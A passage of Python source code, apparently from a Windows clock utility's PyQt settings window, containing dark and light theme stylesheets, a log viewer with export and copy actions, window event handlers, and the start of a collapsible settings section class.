border-radius: {self.getPx(2)}px;
}}
QSlider::handle {{
border: {self.getPx(4)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[0]});
}}
QSlider::handle:hover {{
border: {self.getPx(3)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(7)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[0]});
}}
QSlider::handle:disabled {{
border: {self.getPx(4)}px solid #404040;
margin: {self.getPx(-8)}px {self.getPx(-10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: #212121;
}}
QSlider::add-page {{
border-radius: {self.getPx(3)}px;
background: #303030;
}}
QSlider::sub-page {{
border-radius: {self.getPx(3)}px;
background: rgb({colors[0]});
}}
QSlider::add-page:disabled {{
border-radius: {self.getPx(2)}px;
background: #212121;
}}
QSlider::sub-page:disabled {{
border-radius: {self.getPx(2)}px;
background: #212121;
}}
QToolTip {{
border: {self.getPx(1)}px solid #222222;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #262626;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #212121;
font-family: "Segoe UI Variable Display";
font-size: 9pt;
width: {self.getPx(300)}px;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: 0.6px solid #262626;
border-bottom: {self.getPx(2)}px solid rgb({colors[1]});
}}
#background,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
/*background-color: #212121;*/
background: transparent;
}}
QScrollArea {{
color: white;
/*background-color: #212121;*/
background: transparent;
}}
QLabel {{
font-family: "Segoe UI Variable Display Semib";
font-weight: medium;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
#greyishLabel {{
color: #aaaaaa;
}}
#warningLabel {{
color: #bdba00;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QSpinBox {{
background-color: rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(99, 99, 99, 25%);
}}
QPushButton {{
width: {self.getPx(100)}px;
background-color:rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(99, 99, 99, 25%);
}}
QPushButton:hover {{
background-color:rgba(86, 86, 86, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(100, 100, 100, 25%);
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid rgba(107, 107, 107, 25%);
}}
#AccentButton{{
color: black;
background-color: rgb({colors[1]});
border-color: rgb({colors[1]});
border-bottom-color: rgb({colors[2]});
}}
#AccentButton:hover{{
background-color: rgba({colors[1]}, 80%);
border-color: rgb({colors[2]});
border-bottom-color: rgb({colors[2]});
}}
#AccentButton:pressed{{
color: #555555;
background-color: rgba({colors[1]}, 80%);
border-color: rgb({colors[2]});
border-bottom-color: rgb({colors[2]});
}}
#title{{
margin: {self.getPx(2)}px;
margin-bottom: 0px;
font-weight: bold;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
font-size: 13pt;
border-radius: {self.getPx(4)}px;
}}
#subtitleLabelHover {{
background-color: rgba(20, 20, 20, 1%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
border-radius: {self.getPx(6)}px;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid transparent;
}}
#subtitleLabelHover:hover{{
background-color: rgba(255, 255, 255, 4%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(36, 36, 36, 50%);
border-bottom: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: rgba(71, 71, 71, 25%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 75%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: rgba(71, 71, 71, 0%);
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: rgba(71, 71, 71, 0%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: rgba(71, 71, 71, 0%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(25, 25, 25, 50%);
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: rgba(30, 30, 30, 25%);
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: rgba(71, 71, 71, 0%);
color: #bbbbbb;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #444444;
background-color: #303030;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: {self.getPx(100)}px;
background-color:rgba(81, 81, 81, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(99, 99, 99, 25%);
}}
#stCmbbx:disabled {{
width: {self.getPx(100)}px;
background-color: #303030;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(86, 86, 86, 25%);
}}
#stCmbbx:hover {{
background-color:rgba(86, 86, 86, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(100, 100, 100, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(107, 107, 107, 25%);
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid rgba(36, 36, 36, 50%);
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background: rgba(255, 255, 255, 6%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar {{
background: rgba(71, 71, 71, 25%);
margin: {self.getPx(4)}px;
margin-left: 0px;
width: {self.getPx(16)}px;
height: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar:horizontal {{
margin-bottom: 0px;
padding-bottom: 0px;
height: {self.getPx(12)}px;
}}
QScrollBar::handle {{
margin: {self.getPx(3)}px;
min-height: {self.getPx(20)}px;
min-width: {self.getPx(20)}px;
border-radius: {self.getPx(3)}px;
background: rgba(80, 80, 80, 25%);
}}
QScrollBar::handle:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: rgba(112, 112, 112, 25%);
}}
QScrollBar::add-line {{
height: 0;
width: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line {{
height: 0;
width: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow, QScrollBar::down-arrow {{
background: none;
}}
QScrollBar::add-page, QScrollBar::sub-page {{
background: none;
}}
#titlebarLabel {{
color: red;
background: transparent;
font-size: 10pt;
}}
#dialogButtonWidget{{
background-color: #1d1d1d;
}}
""")
else:
if ApplyMica(self.winId().__int__(), MICAMODE.LIGHT) != 0x0:
GlobalBlur(self.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.clockPosTitle.setIcon(getPath(f"size_{self.iconMode}.png"))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: transparent;
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[4]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QSlider {{
height: {self.getPx(20)}px;
margin-left: {self.getPx(10)}px;
margin-right: {self.getPx(10)}px;
border-radius: {self.getPx(2)}px;
}}
QSlider::groove {{
height: {self.getPx(4)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
background: #303030;
}}
QSlider::handle {{
border: {self.getPx(4)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[4]});
}}
QSlider::handle:hover {{
border: {self.getPx(1)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgb({colors[4]});
}}
QSlider::handle:disabled {{
border: {self.getPx(4)}px solid #eeeeee;
margin: -{self.getPx(8)}px -{self.getPx(10)}px;
height: {self.getPx(8)}px;
border-radius: {self.getPx(9)}px;
background: rgba(106, 106, 106, 25%);
}}
QSlider::add-page {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QSlider::sub-page {{
border-radius: {self.getPx(3)}px;
background: rgb({colors[4]});
}}
QSlider::add-page:disabled {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QSlider::sub-page:disabled {{
border-radius: {self.getPx(3)}px;
background: #eeeeee;
}}
QToolTip{{
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #eeeeee;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: rgba(255, 255, 255, 10%);
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #fefefe;
font-family: "Segoe UI Variable Display";
font-size: 9pt;
width: {self.getPx(300)}px;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: 0.6px solid #eeeeee;
border-bottom: {self.getPx(2)}px solid rgb({colors[4]});
}}
#background,QScrollArea,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
background-color: transparent;
}}
* {{
background-color: transparent;
color: black;
font-size: 8pt;
}}
#warningLabel {{
color: #bd0000;
background-color: transparent;
}}
QPushButton {{
width: {self.getPx(100)}px;
background-color: rgba(255, 255, 255, 70%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
QPushButton:hover {{
background-color: rgba(238, 238, 238, 100%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
/*background-color: rgba(255, 255, 255, 10%);*/
margin: {self.getPx(2)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border-radius: {self.getPx(4)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#subtitleLabelHover {{
background-color: rgba(0, 0, 0, 1%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
border-radius: {self.getPx(6)}px;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid transparent;
}}
#subtitleLabelHover:hover{{
background-color: rgba(0, 0, 0, 6%);
margin: {self.getPx(10)}px;
margin-top: 0px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: rgba(255, 255, 255, 10%);
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(0)}px;
border-bottom-right-radius: {self.getPx(0)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: {self.getPx(1)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: rgba(255, 255, 255, 10%);
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: rgba(255, 255, 255, 10%);
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #eeeeee;
color: rgba(136, 136, 136, 25%);
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid rgba(136, 136, 136, 25%);
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(0)}px solid rgba(136, 136, 136, 25%);
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid rgba(136, 136, 136, 25%);
background-color: #eeeeee;
color: rgba(136, 136, 136, 25%);
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: {self.getPx(100)}px;
background-color: rgba(255, 255, 255, 10%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#stCmbbx:disabled {{
width: {self.getPx(100)}px;
background-color: #eeeeee;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
}}
#stCmbbx:hover {{
background-color: rgba(238, 238, 238, 25%);
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid rgba(204, 204, 204, 25%);
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid rgba(196, 196, 196, 25%);
padding: {self.getPx(4)}px;
outline: 0px;
background-color: rgba(255, 255, 255, 10%);
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background: rgba(0, 0, 0, 6%);
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: none;
padding: none;
outline: none;
}}
QScrollBar:vertical {{
background: rgba(255, 255, 255, 10%);
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
min-height: {self.getPx(20)}px;
background: rgba(196, 196, 196, 25%);
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: rgba(136, 136, 136, 25%);
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
#greyishLabel {{
color: #888888;
}}
#dialogButtonWidget{{
background-color: #eeeeee;
}}
""")
def openLogWindow(self):
class QPlainTextEditWithFluentMenu(QPlainTextEdit):
def __init__(self):
super().__init__()
def contextMenuEvent(self, e: QtGui.QContextMenuEvent) -> None:
menu = self.createStandardContextMenu()
menu.addSeparator()
a = QAction()
a.setText(_("Reload log"))
a.triggered.connect(lambda: textEdit.setPlainText(globals.buffer.getvalue()))
menu.addAction(a)
a2 = QAction()
a2.setText(_("Export log as a file"))
a2.triggered.connect(lambda: saveLog())
menu.addAction(a2)
a3 = QAction()
a3.setText(_("Copy log to clipboard"))
a3.triggered.connect(lambda: copyLog())
menu.addAction(a3)
ApplyMenuBlur(menu.winId().__int__(), menu)
menu.exec(e.globalPos())
return super().contextMenuEvent(e)
global old_stdout, buffer
win = QMainWindow(self)
win.resize(self.getPx(900), self.getPx(600))
win.setObjectName("background")
w = QWidget()
w.setLayout(QVBoxLayout())
w.setContentsMargins(0, 0, 0, 0)
textEdit = QPlainTextEditWithFluentMenu()
textEdit.setReadOnly(True)
if isWindowDark():
textEdit.setStyleSheet(f"QPlainTextEdit{{margin: {self.getPx(10)}px;border-radius: {self.getPx(4)}px;border: {self.getPx(1)}px solid #161616;}}")
else:
textEdit.setStyleSheet(f"QPlainTextEdit{{margin: {self.getPx(10)}px;border-radius: {self.getPx(4)}px;border: {self.getPx(1)}px solid #dddddd;}}")
textEdit.setPlainText(globals.buffer.getvalue())
reloadButton = QPushButton(_("Reload log"))
reloadButton.setFixedWidth(self.getPx(200))
reloadButton.clicked.connect(lambda: textEdit.setPlainText(globals.buffer.getvalue()))
def saveLog():
try:
print("🔵 Saving log...")
f = QFileDialog.getSaveFileName(win, "Save log", os.path.expanduser("~"), "Text file (*.txt)")
if f[0]:
fpath = f[0]
if not ".txt" in fpath.lower():
fpath += ".txt"
with open(fpath, "wb") as fobj:
fobj.write(globals.buffer.getvalue().encode("utf-8"))
fobj.close()
os.startfile(fpath)
print("🟢 log saved successfully")
textEdit.setPlainText(globals.buffer.getvalue())
else:
print("🟡 log save cancelled!")
textEdit.setPlainText(globals.buffer.getvalue())
except Exception as e:
report(e)
textEdit.setPlainText(globals.buffer.getvalue())
exportButton = QPushButton(_("Export log as a file"))
exportButton.setFixedWidth(self.getPx(200))
exportButton.clicked.connect(lambda: saveLog())
def copyLog():
try:
print("🔵 Copying log to the clipboard...")
globals.app.clipboard().setText(globals.buffer.getvalue())
print("🟢 Log copied to the clipboard successfully!")
textEdit.setPlainText(globals.buffer.getvalue())
except Exception as e:
report(e)
textEdit.setPlainText(globals.buffer.getvalue())
copyButton = QPushButton(_("Copy log to clipboard"))
copyButton.setFixedWidth(self.getPx(200))
copyButton.clicked.connect(lambda: copyLog())
hl = QHBoxLayout()
hl.setSpacing(self.getPx(5))
hl.setContentsMargins(self.getPx(10), self.getPx(10), self.getPx(10), 0)
hl.addWidget(exportButton)
hl.addWidget(copyButton)
hl.addStretch()
hl.addWidget(reloadButton)
w.layout().setSpacing(0)
w.layout().setContentsMargins(self.getPx(5), self.getPx(5), self.getPx(5), self.getPx(5))
w.layout().addLayout(hl, stretch=0)
w.layout().addWidget(textEdit, stretch=1)
win.setCentralWidget(w)
win.hwnd = win.winId().__int__()
win.setAttribute(Qt.WA_TranslucentBackground)
win.setAttribute(Qt.WA_NoSystemBackground)
win.setAutoFillBackground(True)
win.hwnd = win.winId().__int__()
window_style = win32gui.GetWindowLong(win.hwnd, GWL_STYLE)
win32gui.SetWindowLong(win.hwnd, GWL_STYLE, window_style | WS_POPUP | WS_THICKFRAME | WS_CAPTION | WS_SYSMENU)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(win, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(win)
if ApplyMica(win.hwnd, isWindowDark()) != 0:
if isWindowDark():
GlobalBlur(win.winId().__int__(), Dark=True, Acrylic=True, hexColor="#333333ff")
else:
GlobalBlur(win.winId().__int__(), Dark=False, Acrylic=True, hexColor="#ffffffdd")
win.show()
win.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
win.setWindowIcon(QIcon(pixmap))
def moveEvent(self, event: QMoveEvent) -> None:
if(self.updateSize):
pass
else:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
super().moveEvent(event)
def mouseReleaseEvent(self, event) -> None:
if(self.updateSize):
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.applyStyleSheet()
if not self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.updateSize = False
return super().mouseReleaseEvent(event)
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
self.activateWindow()
return super().show()
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if event.type() == event.WindowStateChange:
if self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;}}")
else:
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
return super().eventFilter(watched, event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return round(original*(self.screen().logicalDotsPerInch()/96))
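# Collapsible settings section: an icon, title and description header whose child widgets are revealed or hidden with an animated container.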
class QSettingsTitle(QWidget):
oldScrollValue = 0
showing = False
searchMode = False
childrenw = []
def __init__(self, text: str, icon: str, descText: str = "No description provided"):
if isWindowDark():
self.iconMode = "white"
semib = "Semib"
else:
self.iconMode = "black"
semib = ""
super().__init__()
self.icon = icon
self.setObjectName("subtitleLabel")
self.label = QLabel("\u200e"+text, self)
self.label.setLayoutDirection(Qt.LayoutDirection.LeftToRight)
self.label.setAlignment(Qt.AlignLeft)
self.setMaximumWidth(self.getPx(1000))
self.descLabel = QLabel(descText, self)
self.descLabel.setLayoutDirection(Qt.LayoutDirection.LeftToRight)
self.descLabel.setObjectName("greyishLabel")
if lang == lang_zh_TW:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";")
self.descLabel.setStyleSheet("font-size: 8pt;background: none;font-family: \"Microsoft JhengHei UI\";")
elif lang == lang_zh_CN:
